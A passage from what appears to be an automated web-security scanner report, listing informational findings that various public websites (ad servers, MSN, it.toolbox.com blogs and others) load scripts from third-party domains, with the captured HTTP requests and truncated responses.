<link rel="stylesheet" href="http://yui.yahooapis.com/2.5.1/build/reset-fonts-grids/reset-fonts-grids.css" type="text/css" media="screen"/><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/yahoo-dom-event/yahoo-dom-event.js"></script><link type="text/css" rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css"/><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"/><script type="text/javascript" src="/script/jquery/jquery.checkbox.js">
...[SNIP]...
<link rel="stylesheet" href="http://yui.yahooapis.com/2.5.1/build/treeview/assets/skins/sam/treeview.css" type="text/css" media="screen"/><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/yahoo/yahoo-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/dom/dom-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/event/event-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/container/container-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/animation/animation-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/treeview/treeview-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/calendar/calendar-min.js"></script>
...[SNIP]...
<div class="" id="pageContent"><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/yahoo/yahoo-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/cookie/cookie-beta-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/connection/connection-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/animation/animation-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/container/container-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/autocomplete/autocomplete-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/json/json-min.js"></script><script type="text/javascript" src="http://yui.yahooapis.com/2.5.1/build/event/event-min.js"></script>
...[SNIP]...
<div id="top-bar"><script src="http://widgets3.flux.com/Loader" type="text/javascript" id="8EF6FFFF0099CB5E0002FFFFF68E"></script>
...[SNIP]...
<div id="facebook-likes">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.138. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

18.139. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

Response

18.140. http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleonlinesecurity.blogspot.com
Path:	/2009/03/reducing-xss-by-way-of-automatic.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.blogger.com/static/v1/widgets/283664639-widgets.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAA8oTp_KDiJ7gFvDuWWFfolxTMgYTNRE1Rx_LYfGrUFVNSAyCbuRQ97rWp5GTGsPXkWEfPLZquSJf_5w

Request

GET /2009/03/reducing-xss-by-way-of-automatic.html HTTP/1.1
Host: googleonlinesecurity.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 07:31:10 GMT
Date: Thu, 03 Feb 2011 07:31:10 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Mon, 31 Jan 2011 23:01:13 GMT
ETag: "46be3a13-3a19-4eff-a0ee-89fb8f4284ef"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmln
...[SNIP]...
</style>
<script src='http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAA8oTp_KDiJ7gFvDuWWFfolxTMgYTNRE1Rx_LYfGrUFVNSAyCbuRQ97rWp5GTGsPXkWEfPLZquSJf_5w' type='text/javascript'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/283664639-widgets.js"></script>
...[SNIP]...

18.141. http://gsgd.co.uk/sandbox/jquery/easing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gsgd.co.uk
Path:	/sandbox/jquery/easing/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /sandbox/jquery/easing/ HTTP/1.1
Host: gsgd.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:02 GMT
Server: Apache/1.3.41
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</style>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

18.142. http://health.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.msn.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET / HTTP/1.1
Host: health.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.143. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.msn.com
Path:	/health-topics/quit-smoking/articlepage.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://health.msn.us.intellitxt.com/ast/js/msn/health.msn_cs.js

Request

GET /health-topics/quit-smoking/articlepage.aspx HTTP/1.1
Host: health.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.144. http://hoyt.net/learning.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hoyt.net
Path:	/learning.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://www.google.com/jsapi

Request

GET /learning.aspx HTTP/1.1
Host: hoyt.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=l15cqbuxctzaqqrq3tvjujzo; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 07:31:16 GMT
Connection: close
Content-Length: 80640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
XSS, SQL Inje
...[SNIP]...

<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.145. http://ie6funeral.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ie6funeral.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: ie6funeral.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 07:31:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS3386ceb03ae8a2a8b004e24a99ee39cd=eqasj5fmmjfunb26i2ort8jfn3; expires=Sat, 26 Feb 2011 11:04:38 GMT; path=/; domain=.ie6funeral.com
Last-Modified: Wed, 31 Mar 2010 23:17:09 GMT
ETag: "d2ef9e5aa482e662b02c5d459c2371e9"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8503

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>Announcement | IE6 Funeral</title>

<link rel="shortcut icon" href="/misc/favicon.ico
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="/sites/default/files/css/css_9b3a0334196886b98efeb08fa6081033.css" />
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

18.146. http://inforavel.com/ad_type.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://inforavel.com
Path:	/ad_type.php

Issue detail

The response dynamically includes the following script from another domain:

http://search.dmtracker.com/tags/vs.js

Request

GET /ad_type.php HTTP/1.1
Host: inforavel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.147. http://insidemsn.wordpress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://insidemsn.wordpress.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://s.gravatar.com/js/gprofiles.js?o&ver=MU
http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4
http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110

Request

GET / HTTP/1.1
Host: insidemsn.wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Feb 2011 15:34:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Tue, 01 Feb 2011 15:30:22 +0000
Cache-Control: max-age=28, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://insidemsn.wordpress.com/xmlrpc.php
Link: <http://wp.me/16dqb>; rel=shortlink
X-nananana: Batcache
Content-Length: 27235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<!--
generate
...[SNIP]...
<link rel='stylesheet' id='grunion.css-css' href='http://s1.wp.com/wp-content/mu-plugins/grunion-contact-form-2.0/css/grunion.css?m=1296500193g&ver=MU' type='text/css' media='all' />
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...

18.148. http://investing.money.msn.com/investments/stock-price previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.msn.com
Path:	/investments/stock-price

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /investments/stock-price?Symbol=ups HTTP/1.1
Host: investing.money.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.149. http://it.toolbox.com/blogs/database-soup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-soup

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1546885315?
http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=postgresql;kw=opensource;kw=oracle;kw=sql;kw=greenplum;kw=datawarehouse;kw=businessintellignce;kw=bi;kw=linux;sz=728x90,468x60,1x1;tile=6;ord=1546885315?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=postgresql;kw=opensource;kw=oracle;kw=sql;kw=greenplum;kw=datawarehouse;kw=businessintellignce;kw=bi;kw=linux;sz=728x90,468x60,1x1;tile=6;ord=1546885315?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1546885315?">

   </script>
...[SNIP]...

18.150. http://it.toolbox.com/blogs/database-talk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-talk

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=121883018?
http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=applicationdevelopment;kw=databasetechnology;kw=dba;kw=IBM;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=121883018?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63383
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=applicationdevelopment;kw=databasetechnology;kw=dba;kw=IBM;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=121883018?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=121883018?">

   </script>
...[SNIP]...
<br>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...

18.151. http://it.toolbox.com/blogs/db2luw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2luw

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1866233716?
http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=DB2;kw=IBM;kw=DB2tips;kw=DB2blog;kw=DB2features;kw=database;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1866233716?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
http://pmetrics.performancing.com/5970.js

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62898
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=DB2;kw=IBM;kw=DB2tips;kw=DB2blog;kw=DB2features;kw=database;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1866233716?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1866233716?">

   </script>
...[SNIP]...
<br>

<script src="http://pmetrics.performancing.com/5970.js" type="text/javascript"></script>
...[SNIP]...

18.152. http://it.toolbox.com/blogs/db2zos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2zos

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=2129566099?
http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=z%2fOS;kw=db;kw=IBM;kw=DB29;kw=DB28;sz=728x90,468x60,1x1;tile=6;ord=2129566099?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
http://twittercounter.com/embed/?username=wfavero&style=bird
http://www.tripit.com/account/badge/id/2069AEE8D54DCEC2C6A1A296C257E1E6/div_id/tripit-badge/badge.js

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78281
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=z%2fOS;kw=db;kw=IBM;kw=DB29;kw=DB28;sz=728x90,468x60,1x1;tile=6;ord=2129566099?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=2129566099?">

   </script>
...[SNIP]...
<div id="tripit-badge"><script type="text/javascript" src="http://www.tripit.com/account/badge/id/2069AEE8D54DCEC2C6A1A296C257E1E6/div_id/tripit-badge/badge.js"></script>
...[SNIP]...
<br>

<script type="text/javascript" language="JavaScript" src="http://twittercounter.com/embed/?username=wfavero&style=bird"></script>
...[SNIP]...

18.153. http://it.toolbox.com/blogs/elsua previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/elsua

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1727216896?
http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=kowledgemanagement;kw=collaboration;kw=communitiesofpractice;kw=socialnetworking;kw=andweb2.0;kw=technology;kw=IT;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1727216896?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64411
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=kowledgemanagement;kw=collaboration;kw=communitiesofpractice;kw=socialnetworking;kw=andweb2.0;kw=technology;kw=IT;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1727216896?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1727216896?">

   </script>
...[SNIP]...

18.154. http://it.toolbox.com/blogs/juice-analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/juice-analytics

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=509272757?
http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=bi;kw=businessintelligence;kw=analytics;kw=customeranalytics;kw=Excel;kw=mapping;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=509272757?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61828
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=bi;kw=businessintelligence;kw=analytics;kw=customeranalytics;kw=Excel;kw=mapping;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=509272757?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

